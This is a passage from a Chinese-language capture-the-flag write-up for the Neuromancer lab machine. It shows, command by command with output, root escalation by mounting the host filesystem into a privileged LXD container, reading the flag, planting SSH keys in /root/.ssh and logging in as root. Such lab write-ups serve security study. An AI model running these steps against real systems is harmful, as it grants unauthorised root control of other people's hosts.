+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| haxor | 468c747448ec | no     | alpine v3.11 (20200119_01:51) | x86_64 | 3.08MB | Jan 19, 2020 at 8:16am (UTC) |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+

接下来，您必须基于导入的容器映像创建一个实际的容器：

ta@neuromancer:/tmp$ lxc init haxor -c security.privileged=true
Creating the container
Container name is: right-whippet
ta@neuromancer:/tmp$ lxc list
+---------------+---------+------+------+------------+-----------+
|     NAME      |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------------+---------+------+------+------------+-----------+
| right-whippet | STOPPED |      |      | PERSISTENT | 0         |
+---------------+---------+------+------+------------+-----------+

请注意，容器名称是自动分配的。我没有具体说明。尽管来自Ubuntu lxc开发人员很幽默。尽管Booj的文章包含了您需要的所有详细信息，但-c开关选项可以有效地为您提供整个主机文件系统所需的Yoda功能。接下来，需要为新容器（“ right-whippet”）指定磁盘安装选项：

ta@neuromancer:/tmp$ lxc config device add right-whippet whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to right-whippet

如所见，装载主机文件系统的根目录/（Neuromancer），并装载为该命名（“whatever”）到/mnt/root。现在可以启动容器，然后使用以下命令进入bash会话：

启动容器

ta@neuromancer:/tmp$ lxc start right-whippet
ta@neuromancer:/tmp$ lxc list
+---------------+---------+------+------+------------+-----------+
|     NAME      |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------------+---------+------+------+------------+-----------+
| right-whippet | RUNNING |      |      | PERSISTENT | 0         |
+---------------+---------+------+------+------------+-----------+

进入bash提权，成功拥有root权限

ta@neuromancer:/tmp$ lxc exec right-whippet --mode=interactive /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root
~ # ls
~ # pwd
/root

步骤7-证明我们对Neuromancer文件系统具有根目录访问权限

我们进入容器的/mnt/root目录：

~ # cd /mnt/root
/mnt/root # ls
bin         etc         lib         media       proc        sbin        sys         var
boot        home        lib64       mnt         root        snap        tmp         vmlinuz
dev         initrd.img  lost+found  opt         run         srv         usr

您实际上是在查看主机（Neuromancer）文件系统的根目录。现在，可以轻松地将cd进入“root”，然后看到最重要的“flag.txt”文件。

/mnt/root # cd root
/mnt/root/root # ls
flag.txt      struts2       velocity.log
/mnt/root/root # cat flag.txt
be3306f431dae5ebc93eebb291f4914a

但是我们还没有完成。为了使该计划生效，需要能够写入root（即/mnt/root/root）：

/mnt/root/root # echo fuck-all-you-shit > fuck.txt
/mnt/root/root # cat fuck.txt
fuck-all-you-shit

是的。有用！所以…现在，只需要获得一个root shell。

步骤8：SSH密钥生成

现在有了写访问权，需要生成一组ssh密钥。仍在容器bash会话（right-whippet）中时，该过程涉及：

• 运行ssh-keygen。选择您喜欢的任何选项，但确保文件保存到/mnt/root/root/.ssh
• 创建一个authorized_keys文件: touch /mnt/root/root/.ssh/authorized_keys
• 将新创建的公共密钥的内容分配到授权密钥文件中： cat /mnt/root/root/.ssh/id_rsa.pub >> authorized_keys

将之前/home/ta/.ssh目录下的文件拷贝到/mnt/root/root/.ssh/下

/mnt/root/root/.ssh # cp /mnt/root/home/ta/.ssh/authorized_keys authorized_keys
/mnt/root/root/.ssh # ls
authorized_keys  known_hosts
/mnt/root/root/.ssh # cp /mnt/root/home/ta/.ssh/id_rsa id_rsa
/mnt/root/root/.ssh # cp /mnt/root/home/ta/.ssh/id_rsa.pub id_rsa.pub

/mnt/root/root/.ssh的内容现在应如下所示：

/mnt/root/root/.ssh # ls
authorized_keys  id_rsa           id_rsa.pub       known_hosts

步骤9：将密钥复制到攻击机中

由于使用的是之前/home/ta/.ssh/目录下的文件，所以连接的话，如下连接即可

root@kali:~# ssh -i /root/.ssh/id_rsa -p 34483 root@192.168.56.110
 ----------------------------------------------------------------
|                Neuromancer Secure Remote Access                |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police  |
 ----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Tue Jul  3 22:02:40 2018
root@neuromancer:~# id
uid=0(root) gid=0(root) groups=0(root)
root@neuromancer:~# whoami
root
root@neuromancer:~# 

成功连接，密码还是之前连接ta的123456

在“right-whippet” sh会话中执行此操作的最简单方法是，将id_rsa和id_rsa.pub的内容显示在屏幕上，然后将其复制/粘贴到您喜欢的文本编辑器中。确保将文件权限更改为chmod 400，否则当尝试使用它们时，这些键将被忽略（我浪费了一些时间想知道为什么直到这样做之前，这些键才一直不起作用）。

现在只想说，太帅会不会帅死人。。。:)))):::)))::))

提权2总结

总而言之，Neuromancer是一台非常有趣的机器。为了达到目的，必须root另一box（Straylight），然后学习如何正确使用socat进行端口转发。一旦在Neuromancer上使用了低特权shell，特权映射就非常简单了……至少对于内核利用途径而言。但是，很高兴发现lxd提权线索隐藏在范围内.

我只是涉足容器（Docker）之前就某些漏洞进行了一些实验工作，但是从未真正使用容器配置问题来在主机上root。我四处搜寻以确定其他文章是否也涵盖了这个角度，但是到目前为止我还没有发现。因此…最好做一些别人可能会觉得有用的新事情。

Neuromancer知识点总结:

• tty可交互式shell
• ssh-key毒化
• lxd容器提权(new)
• scp命令传输文件
• tomcat-users.xml密码泄露

Game over

不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…

The end,to be continue…